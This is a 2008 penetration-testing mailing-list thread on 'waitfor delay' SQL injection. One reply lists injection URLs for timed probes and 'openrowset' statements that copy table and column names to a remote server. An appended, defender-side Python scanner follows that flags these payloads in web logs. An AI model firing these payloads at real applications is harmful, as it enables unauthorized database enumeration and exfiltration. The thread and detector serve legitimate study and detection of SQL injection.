Penetration Testing mailing list archives
Re: SQL Injection - Waitfor delay
From: "Anthony Cicalla" <anthony.cicalla () gmail com>
Date: Thu, 16 Oct 2008 13:44:12 -0700
wait for delay examples

http://www.domain.com/index.asp?Login=&pass=4;waitfor%20delay%20'0:0:15'--
http://www.domain.com/index.asp?Login=&pass=4;waitfor%20delay%20'0:0:25'--
http://www.domain.com/index.asp?Login=&pass=4;waitfor%20delay%20'0:0:35'--

openrowset to other mssql database.

http://www.domain.com/index.asp?Login=&pass=4;insert%20into%20openrowset('sqloledb','server=localpubip;uid=auditor;pwd=pass','select%20*%20from%20sysobjectsremote')%20select%20id,name%20from%20sysobjects%20where%20xtype%20='U'--
http://www.domain.com/index.asp?Login=&pass=4;insert%20into%20openrowset('sqloledb','server=localpubip;uid=auditor;pwd=pass','select%20*%20from%20syscolumnsremote')%20select%20id,name%20from%20syscolumns%20where%20xtype%20='U'--

On Wed, Oct 15, 2008 at 7:33 PM, p1g <killfactory () gmail com> wrote:
x,

Check out the DefCon site. There was a session that covered some of these techniques.

On Mon, Oct 13, 2008 at 9:42 AM, xelerated <xelerated () gmail com> wrote:

Hi all,

I am trying to find more information about a SQL Injection using "waitfor delay". So far, no one that I have asked in the pen test and security field feels it's a vulnerability, but my client does think it's a big deal but there really is very little information that I can find on it.

I hear rumors that using the waitfor delay can help enumerate a database, but again, I'm not sure about that.

I'd like to pull on the vast knowledge of this list to see if that counts in a test as a SQL Inject, and if it's a big deal if you can use it.

Thanks!
Chris

--
-p1g
SnortCP, ESSE-D, C|HFI, TNCP, TECP, NACP, A+, whatever..

If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked.
-- former White House cybersecurity czar Richard Clarke
-- Anthony,
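
A defender-side view of the requests above, added here as an example and not part of the original thread: a Python scan of web-server log lines that URL-decodes the query, flags stacked `waitfor delay` and `insert into openrowset` statements, and compares the logged response time with the requested delay to tell an executed statement from a probe. The log layout (eight space-separated fields ending in time-taken in milliseconds), the IP addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Stacked T-SQL statements of the two kinds shown in the post above.
WAITFOR = re.compile(r";\s*waitfor\s+delay\s*'(\d{1,2}):(\d{1,2}):(\d{1,2})'", re.I)
OPENROWSET = re.compile(r";\s*insert\s+into\s+openrowset\s*\(", re.I)

# Constructed sample; assumed layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status time-taken(ms)
SAMPLE_LOG = """\
2008-10-16 13:40:01 192.0.2.10 GET /index.asp Login=bob&pass=secret 200 120
2008-10-16 13:41:07 192.0.2.77 GET /index.asp Login=&pass=4;waitfor%20delay%20'0:0:15'-- 200 15210
2008-10-16 13:42:30 192.0.2.77 GET /index.asp Login=&pass=4%253Bwaitfor%2520delay%2520'0:0:25'-- 500 95
2008-10-16 13:43:02 192.0.2.77 GET /index.asp Login=&pass=4;insert%20into%20openrowset('sqloledb','server=PLACEHOLDER','q')%20select%201-- 200 310
"""

def decode(query, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%253B) are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def classify(line):
    """Return (verdict, detail) for one log line, or None when nothing matches."""
    parts = line.split()
    if len(parts) != 8:
        return None
    ip, query, taken_ms = parts[2], decode(parts[5]), int(parts[7])
    m = WAITFOR.search(query)
    if m:
        h, mi, s = map(int, m.groups())
        asked_ms = ((h * 60 + mi) * 60 + s) * 1000
        # A response at least as slow as the requested delay means the stacked
        # statement ran; a fast response means the probe was only attempted.
        verdict = "executed" if taken_ms >= asked_ms else "attempted"
        return verdict, f"waitfor delay {asked_ms // 1000}s from {ip}"
    if OPENROWSET.search(query):
        return "attempted", f"insert into openrowset from {ip}"
    return None

def scan(log_text):
    """Classify every line and keep only the hits."""
    results = (classify(line) for line in log_text.splitlines())
    return [r for r in results if r]

if __name__ == "__main__":
    for verdict, detail in scan(SAMPLE_LOG):
        print(verdict, detail)
```

An "executed" verdict means the application passed the parameter into a SQL batch unmodified, which is the condition a parameterized query removes.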